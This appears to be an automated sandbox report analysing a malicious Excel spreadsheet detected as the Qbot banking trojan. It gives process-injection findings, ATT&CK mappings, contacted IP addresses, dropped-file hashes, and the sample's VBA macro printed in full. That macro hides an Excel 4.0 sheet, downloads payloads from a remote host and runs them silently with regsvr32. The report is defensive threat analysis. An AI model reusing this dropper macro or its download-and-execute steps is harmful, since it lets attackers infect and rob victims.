                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,6_2_1000D01F
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,6_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,7_2_0008AEB4
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,13_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,6_2_10005F82
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,6_2_1000DFAD
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00784495 or ebx, dword ptr fs:[00000030h] 13_2_00784495
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00085A61 RtlAddVectoredExceptionHandler,7_2_00085A61
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00085A61 RtlAddVectoredExceptionHandler,14_2_00085A61

                        HIPS / PFW / Operating System Protection Evasion:

                        Maps a DLL or memory area into another process
                        Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 1E102D
                        Allocates memory in foreign processes
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2980 base: B0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2980 base: 1E102D value: E9
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2072 base: B0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2072 base: 1E102D value: E9
                        Yara detected hidden Macro 4.0 in Excel
                        Source: Yara match File source: Compensation-1214892625-09272021.xls, type: SAMPLE
                        Source: explorer.exe, 00000007.00000002.875487532.0000000000CF0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000007.00000002.875487532.0000000000CF0000.00000002.00020000.sdmp Binary or memory string: !Progman
                        Source: explorer.exe, 00000007.00000002.875487532.0000000000CF0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000831C2 CreateNamedPipeA,7_2_000831C2
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,6_2_1000980C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,6_2_1000D01F

                        Stealing of Sensitive Information:

                        Yara detected Qbot
                        Source: Yara match File source: 6.2.regsvr32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 6.2.regsvr32.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 13.2.regsvr32.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 13.2.regsvr32.exe.420000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, type: MEMORY

                        Remote Access Functionality:

                        Yara detected Qbot
                        Source: Yara match File source: 6.2.regsvr32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 6.2.regsvr32.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 13.2.regsvr32.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 13.2.regsvr32.exe.420000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Command and Scripting Interpreter 11 | Windows Service 3 | Windows Service 3 | Masquerading 121 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 413 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | Scripting 2 | Logon Script (Windows) | Scheduled Task/Job 1 | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | Service Execution 2 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap |  | Carrier Billing Fraud
                        Cloud Accounts | Native API 3 | Network Logon Script | Network Logon Script | Process Injection 413 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Exploitation for Client Execution 32 | Rc.common | Rc.common | Scripting 2 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact

                        Behavior Graph

                        [Figure: behavior graph. Behavior Graph ID: 492195; Sample: Compensation-1214892625-092...; Startdate: 28/09/2021; Architecture: WINDOWS; Score: 100]

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label | Link
                        Compensation-1214892625-09272021.xls | 9% | Metadefender |  | Browse
                        Compensation-1214892625-09272021.xls | 11% | ReversingLabs | Script.Trojan.Heuristic |

                        Dropped Files

                        Source | Detection | Scanner | Label | Link
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat | 100% | Joe Sandbox ML |  |
                        C:\Users\user\Drezd.red | 9% | ReversingLabs |  |

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        Source | Detection | Scanner | Label | Link
                        http://www.%s.comPA | 0% | URL Reputation | safe |
                        http://190.14.37.178/44467.5523376157.dat | 0% | Avira URL Cloud | safe |
                        http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://190.14.37.178/44467.5523376157.dat | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://www.%s.comPA | regsvr32.exe, 00000006.00000002.609965037.00000000021D0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmp | false |  | high
                        http://servername/isapibackend.dll | regsvr32.exe, 00000005.00000002.611948922.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.609589480.0000000001ED0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.612616089.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.613822412.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.624790333.0000000000980000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                          Contacted IPs

                          Public

                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          185.183.96.67 | unknown | Netherlands |  | 60117 | HSAE | false
                          190.14.37.178 | unknown | Panama |  | 52469 | OffshoreRacksSAPA | false
                          185.250.148.213 | unknown | Russian Federation |  | 48430 | FIRSTDC-ASRU | false

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:492195
                          Start date:28.09.2021
                          Start time:13:15:22
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 39s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:Compensation-1214892625-09272021.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winXLS@25/6@0/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 23.3% (good quality ratio 21.8%)
                          • Quality average: 75.9%
                          • Quality standard deviation: 28.3%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 136
                          • Number of non-executed functions: 81
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to English - United States
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • Not all processes were analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/492195/sample/Compensation-1214892625-09272021.xls

                          Simulations

                          Behavior and APIs

                          Time | Type | Description
                          13:16:51 | API Interceptor | 27x Sleep call for process: regsvr32.exe modified
                          13:16:53 | API Interceptor | 904x Sleep call for process: explorer.exe modified
                          13:16:55 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
                          13:16:56 | Task Scheduler | Run new task: bganttcv path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):387072
                          Entropy (8bit):4.528526718288657
                          Encrypted:false
                          SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2Mm:vs6Xpq0H3Jhds/9+qC/zfTPLQ
                          MD5:72FBB8519D0E09871770F70BADB9E06D
                          SHA1:55D43A77EF1F2EB80B93F73224C8391C4C4AEAB4
                          SHA-256:1E12BBEEE2F67A232F46593FEDA28B7BED1F0793C31DDA211FD4687AD548A07C
                          SHA-512:011D6A51019EA32CC22F66D8FDD670CE838DF5B05911C48888A4DA8C434630FBB0E1D562F108DBA4498E7C6877FD16CF533A0BB0A6DB00A7B2826882DDC8457B
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):162688
                          Entropy (8bit):4.254383493408124
                          Encrypted:false
                          SSDEEP:1536:C6tL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CUJNSc83tKBAvQVCgOtmXmLpLm4l
                          MD5:0A0D1EA546EAE1EB37BE8504A1BDEDBF
                          SHA1:3C41F8F0A0F81FF4221E2F52B64AC29B4CF831D4
                          SHA-256:35F89C20AC1950E68ABD4259B6C5FE15A083F927FCDA7DC5772CD7153A4BED9C
                          SHA-512:6C120A1A2F0AE51454F5F24ACFE20261BE82181B0A287DC98A502AACFDBF99CBC9EFECFBF0BCC502192F35BACAB3EA13B97C68C880EBE36F23B3B4166AA92973
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):15676
                          Entropy (8bit):4.532537064976408
                          Encrypted:false
                          SSDEEP:192:Cxl811DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:C3wxesT20lheZ3waE5D7qxIxkxe
                          MD5:76C2C75F386C3360BDE27E064F98E9D0
                          SHA1:97FC7A67C9411195152E7D2DB62F4B96D817EEE0
                          SHA-256:A47AFE468EA44172F39F9A0A51729C40022FA74D948F56B8261BBC0D4D2470A9
                          SHA-512:56E81A6CB1A2AAA8064A0372D6E386F23475B45ED76887345FDC039161E7698C50A104FEF747B9BD5776343F4B0325A8C29B51EB77E32E5F6EBB3943F11C5483
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\Drezd.red
                          Process:C:\Windows\SysWOW64\explorer.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):387072
                          Entropy (8bit):1.6961804656486577
                          Encrypted:false
                          SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
                          MD5:B19B0AF9A01DD936D091C291B19696C8
                          SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
                          SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
                          SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          Reputation:unknown

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
                          Entropy (8bit):7.131912306364678
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:Compensation-1214892625-09272021.xls
                          File size:129024
                          MD5:cbf2562df8735334741b3de3ef9a0362
                          SHA1:db3bff7a0edc4dd7e3f4915dc36888f3be97c814
                          SHA256:1b663952d7fa9e49cd53878bfddf2e2906788cbc7394b081e0fea52efd1fb6d1
                          SHA512:8f24c7078ae03464e7bd2979c38f10b708f6fcca7bfab2b60328b135770eed1eb84aa151abde8f20b0a7b8b868f22a74cac1c5f2cf48ac8b0a4a20f94d37f349
                          SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiilBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAnE

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          Static OLE Info

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          OLE File "Compensation-1214892625-09272021.xls"

                          Indicators

                          Has Summary Info:True
                          Application Name:Microsoft Excel
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1251
                          Author:Test
                          Last Saved By:Test
                          Create Time:2015-06-05 18:17:20
                          Last Saved Time:2021-09-27 09:38:52
                          Creating Application:Microsoft Excel
                          Security:0

                          Document Summary

                          Document Code Page:1251
                          Thumbnail Scaling Desired:False
                          Company:
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:1048576

                          Streams with VBA

                          VBA File Name: UserForm2, Stream Size: -1
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:-1
                          Data ASCII:
                          Data Raw:
                          VBA Code
                          Attribute VB_Name = "UserForm2"
                          Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = False
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = False
                          VBA File Name: Module5, Stream Size: 4241
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Module5
                          VBA File Name:Module5
                          Stream Size:4241
                          VBA Code
                          Attribute VB_Name = "Module5"
                          
                          Sub auto_open()
                          On Error Resume Next
                          Trewasd = "REGISTER"
                          Drezden = "="
                          Naret = "EXEC"
                          Application.ScreenUpdating = False
                          Gert
                          Sheets("Sheet777").Visible = False
                          Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite
                          
                          Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
                          Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
                          Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption
                          
                          Sheets("Sheet777").Range("K17") = "=NOW()"
                          Sheets("Sheet777").Range("K18") = ".dat"
                          Sheets("Sheet777").Range("K18") = ".dat"
                          
                          
                          Sheets("Sheet777").Range("H35") = "=HALT()"
                          Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
                          Sheets("Sheet777").Range("I10") = UserForm2.Caption
                          Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
                          Sheets("Sheet777").Range("I12") = "Byukilos"
                          Sheets("Sheet777").Range("G10") = "..\Drezd.red"
                          Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
                          Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
                          Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
                          Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
                          Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
                          Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
                          Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
                          Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
                          Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
                          Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
                          Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
                          Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"
                          
                          
                          Application.Run Sheets("Sheet777").Range("H1")
                          
                          End Sub
                          
                          Sub auto_close()
                          On Error Resume Next
                          Application.ScreenUpdating = True
                             Application.DisplayAlerts = False
                             Sheets("Sheet777").Delete
                             Application.DisplayAlerts = True
                          End Sub
                          
                          Function Gert()
                          Set Fera = Excel4IntlMacroSheets
                          Fera.Add.Name = "Sheet777"
                          End Function
                          VBA File Name: Sheet1, Stream Size: 991
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1
                          Stream Size:991
                          VBA Code
                          Attribute VB_Name = "Sheet1"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          VBA File Name: ThisWorkbook, Stream Size: 2501
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook
                          Stream Size:2501
                          VBA Code
                          Attribute VB_Name = "ThisWorkbook"
                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          Option Explicit
                          
                          Private m_openAlreadyRan As Boolean
                          Private m_isOpenDelayed As Boolean
                          
                          Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
                          End Sub
                          
                          Private Sub asWorkbook_Activateas()
                              On Error Resume Next
                          
                              If m_isOpenDelayed Then
                                  m_isOpenDelayed = False
                                  InitWorkbook
                              End If
                          End Sub
                          
                          Private Sub saWorkbook_Opensa()
                              On Error Resume Next
                          
                          
                          End Sub
                          
                          Private Sub ssaaInitWorkbookssaa()
                              On Error Resume Next
                          
                              If VBA.Val(Application.Version) < 12 Then
                                  Me.Close False
                                  Exit Sub
                              End If
                              '
                                  'Other code
                                  '
                                  '
                                  '
                          End Sub
                          VBA File Name: UserForm2, Stream Size: 1182
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:1182
                          VBA Code
                          Attribute VB_Name = "UserForm2"
                          Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = False
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = False

                          Streams

                          Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                          General
                          Stream Path:\x1CompObj
                          File Type:data
                          Stream Size:108
                          Entropy:4.18849998853
                          Base64 Encoded:True
                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          File Type:data
                          Stream Size:244
                          Entropy:2.65175227267
                          Base64 Encoded:False
                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                          General
                          Stream Path:\x5SummaryInformation
                          File Type:data
                          Stream Size:208
                          Entropy:3.33231709703
                          Base64 Encoded:False
                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
                          General
                          Stream Path:Workbook
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:101831
                          Entropy:7.65479066874
                          Base64 Encoded:True
                          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:662
                          Entropy:5.27592988154
                          Base64 Encoded:True
                          Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTlk
                          File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
                          Stream Size:30
                          Entropy:1.37215976263
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          File Type:data
                          Stream Size:116
                          Entropy:3.43722878834
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
                          File Type:data
                          Stream Size:97
                          Entropy:3.61064918306
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:302
                          Entropy:4.65399600072
                          Base64 Encoded:True
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/f
                          File Type:data
                          Stream Size:226
                          Entropy:3.01175231218
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/o
                          File Type:data
                          Stream Size:272
                          Entropy:3.6318384866
                          Base64 Encoded:True
                          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          File Type:data
                          Stream Size:4332
                          Entropy:4.42025024054
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                          File Type:data
                          Stream Size:2461
                          Entropy:3.4974013905
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                          File Type:data
                          Stream Size:138
                          Entropy:1.48462480805
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                          File Type:data
                          Stream Size:264
                          Entropy:1.9985725068
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
